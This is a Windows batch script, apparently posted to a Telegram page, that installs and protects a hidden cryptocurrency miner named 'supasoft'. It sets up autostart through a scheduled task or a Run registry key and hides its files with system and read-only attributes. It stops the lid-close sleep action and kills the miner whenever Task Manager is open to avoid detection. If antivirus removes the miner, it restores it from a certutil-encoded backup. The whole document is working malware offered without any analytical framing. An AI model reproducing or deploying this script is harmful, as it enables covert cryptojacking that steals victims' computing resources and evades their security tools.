BAT

BAT



BAT

@ECHO OFF


:start_loop


goto :admin_check


REM Check if we have admin or user permissions.

:admin_check

net session >nul 2>&1

if "%ERRORLEVEL%"=="0" (

 goto :schtask_su

) else (

 goto :regkey_su

)


REM If we have admin then install startup to SchTasks.

:schtask_su

schtasks /query /TN "SUPA_SOFT" >NUL 2>&1 || schtasks /create /tn "SUPA_SOFT" /sc ONLOGON /tr "%PUBLIC%\Windows\supasoft.vbs"

REG QUERY "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPA_SOFT" >nul 2>&1

if "%ERRORLEVEL%"=="0" (

 REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SUPA_SOFT" /F

 goto :go_ninja

) else (

 goto :go_ninja

)


REM If we do not have admin then install startup to Registry.

:regkey_su

REG QUERY "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPA_SOFT" >nul 2>&1

if "%ERRORLEVEL%"=="1" (

 REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SUPA_SOFT" /t REG_SZ /F /D "%PUBLIC%\Windows\supasoft.vbs"

 goto :go_ninja

) else (

 goto :go_ninja

)


REM Hide all files as system files and make them read-only.

:go_ninja

attrib +h +s +r "%PUBLIC%\Windows\supasoft.vbs"

attrib +h +s +r "%PUBLIC%\Windows\supasoft.bat"

attrib +h +s +r "%PUBLIC%\Windows\supasoft.exe"

attrib +h +s +r "%PUBLIC%\Windows\supasoft.txt"


REM Set all power schemes to not sleep.

for /f "tokens=4 delims= " %%i IN ('powercfg -q ^| find "Power Scheme GUID:"') do Set StrOne=%%i

for /f "tokens=3 delims= " %%i IN ('powercfg -q ^| find "(Power buttons and lid)"') do Set StrTwo=%%i 

for /f "tokens=4 delims= " %%i IN ('powercfg -q ^| find "(Lid close action)"') do Set StrThree=%%i 


powercfg -SETACVALUEINDEX %StrOne% %StrTwo% %StrThree% 000


REM Watch Taskmgr and if opened, kill supasoft.

:taskmgr_killswitch

tasklist /FI "IMAGENAME eq Taskmgr.exe" 2>NUL | find /I /N "Taskmgr.exe">NUL

if "%ERRORLEVEL%"=="0" goto :kill_supasoft


:taskmgr_respawn

tasklist /FI "IMAGENAME eq Taskmgr.exe" 2>NUL | find /I /N "Taskmgr.exe">NUL

if "%ERRORLEVEL%"=="1" goto :check_supasoft


REM Check if miner process is running.

:check_supasoft

tasklist /FI "IMAGENAME eq supasoft.exe" 2>NUL | find /I /N "supasoft.exe">NUL

if "%ERRORLEVEL%"=="0" goto :start_loop


:dead_supasoft

tasklist /FI "IMAGENAME eq supasoft.exe" 2>NUL | find /I /N "supasoft.exe">NUL

if "%ERRORLEVEL%"=="1" (

 goto :recover_supasoft

 )


REM If miner has been deleted by AV, recover miner from backup and start again.

:recover_supasoft

if exist %PUBLIC%\Windows\supasoft.exe (

  Start %PUBLIC%\Windows\supasoft.exe

  goto :start_loop

) else (

  certutil -decode %PUBLIC%\Windows\supasoft.txt %PUBLIC%\Windows\supasoft.exe

  goto :start_loop

)


REM Taskmgr has been opened, kill supasoft and wait 5 minutes to check again.

:kill_supasoft

tasklist /FI "IMAGENAME eq supasoft.exe" 2>NUL | find /I /N "supasoft.exe">NUL

if "%ERRORLEVEL%"=="0" (

 taskkill -f -im supasoft.exe

 TIMEOUT 300

 goto :admin_check

 )


goto :start_loop

Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org